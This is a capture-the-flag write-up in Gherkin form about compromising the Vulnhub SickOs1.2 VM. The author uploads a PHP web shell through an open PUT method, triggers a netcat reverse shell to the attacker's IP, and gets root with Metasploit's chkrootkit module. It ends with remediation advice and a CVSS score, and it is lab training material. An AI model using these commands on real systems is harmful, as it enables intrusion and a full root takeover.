## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnhub
  Location:
   http://10.0.2.10/test - PUT (header)
  CWE:
    CWE-0078: Improper Neutralization of Special Elements used in an OS Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Get the remote connection with root privileges
  Recommendation:
    Always do security tests of an HTTP method especially
    of the public HTTP methods

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Virtual Box     | 6.1           |
    | Kali Linux      | 2020.3        |
    | Firefox         | 68.10.0esr    |
    | arp-scan        | 1.9.7         |
    | nmap            | 7.80          |
    | dirb            | 2.22          |
    | curl            | 7.68.0        |
    | netcat          | v1.10-41.1+b1 |
    | metasploit      | 5.0.99-dev    |
  TOE information:
    Given a file "SickOs1.2-disk1.vmdk"
    When I run it on Virtual Box
    Then I realize that the user is required to log in to the system
    And I turn off the virtual machine
    And I configure the network of Sickos1.2 VM and Kali VM
    Then I turn on the Kali VM and the Sickos1.2 VM
    And I proceed to look for the IPs of the networks with arp-scan
    And this can be seen in [evidence](img1.png)
    And I discover the IP of the Sickos1.2 VM for this case is
    """
    10.0.2.11
    """
    Then I scan with nmap the open ports of Sickos1.2 VM
    And I can see 2 open ports
    And this can be seen in [evidence](img2.png)

  Scenario: Normal use case
    Given the open port of HTTP
    When I search "http://10.0.2.11/" in Firefox
    Then I access to a web page
    And this can be seen in [evidence](img3.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I access to http://10.0.2.11
    When I try to find other website routes running
    """
    dirb http://10.0.2.11
    """
    Then I can see that the site has a directory in "/test"
    And this can be seen in [evidence](img4.png)
    When I search "http://10.0.2.11/test" in Firefox
    Then I access to a directory
    And this can be seen in [evidence](img5.png)
    When I check the HTTP methods available in the directory "/test", running
    """
    curl -v -X OPTIONS http://10.0.2.11/test
    """
    Then I can see the put method available
    And this can be seen in [evidence](img6.png)
    When I use this PUT method to upload a PHP file that executes command lines
    """
    curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>'
     http://10.0.2.11/test/shell.php
    """
    Then I can see the PHP file in the directory "/test"
    And this can be seen in [evidence](img7.png)
    When I try to run "ls" with this PHP file
    Then I can run it successfully
    And this can be seen in [evidence](img8.png)

  Scenario: Exploitation
    Given I access to http://10.0.2.10/test
    When I run "msfconsole", I open metasploit
    Then I use the "multi/handler" exploit to get a reverse shell, running
    """
    use multi/handler
    """
    And I set the variable "LHOST" in "10.0.2.15" (Kali VM IP)
    And I set the variable "LPORT" in "443"
    And I run "exploit"
    And this can be seen in [evidence](img9.png)
    When I try to connect Sickos1.2 VM to this exploit, searching in Firefox
    """
    http://10.0.2.11/test/shell.php?cmd=nc.traditional -e /bin/bash
    %2010.0.2.15 443
    """
    Then I get a reverse shell of Sickos1.2 VM on Kali VM
    And I upgrade this shell to shell TTY running
    """
    python -c 'import pty; pty.spawn("/bin/bash")'
    """
    And this can be seen in [evidence](img10.png)
    When I navigate through many directories
    Then I found an exploitable version of "chkrootkit" in "/etc/cron.daily"
    And this can be seen in [evidence](img11.png)
    Then I run "exit" to back to meterpreter
    And I run "background" to save the open session in background
    And I run "sessions" to see the session id
    And this can be seen in [evidence](img12.png)
    Then I use the "unix/local/chkrootkit" exploit to get root privileges
    """
    use exploit/unix/local/chkrootkit
    """
    And I set the variable "session" in the session id
    And I set the variable "LPORT" in "443"
    And I run "exploit"
    And this can be seen in [evidence](img13.png)
    Then I wait that the metasploit exploit the vulnerability of "chkrootkit"
    And I get a reverse shell of Sickos1.2 VM with root privileges
    When I run "id", I can see that the user I use is root
    Then I upgrade this shell to shell TTY running again
    """
    python -c 'import pty; pty.spawn("/bin/bash")'
    """
    When I run "ls /root"
    Then I can see a txt file called "7d03aaa2bf93d80040f3f22ec6ad9d5a.txt"
    And this can be seen in [evidence](img14.png)
    And I run "cat /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt"
    Then I get a message that the challenge ends
    And this can be seen in [evidence](img15.png)

  Scenario: Remediation
    When I do security test to all the HTTP methods available in the website
    And I make sure that any method can only be used for what it was designed
    Then I avoid that a hacker can take advantage of it to violate the website

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.3/10 (Critical) - AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.6/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (High) - CR:L/IR:L/AR:L/MS:C/MC:H/MI:H/MA:H/

  Scenario: Correlations
    No correlations have been found to this date 2021-04-09
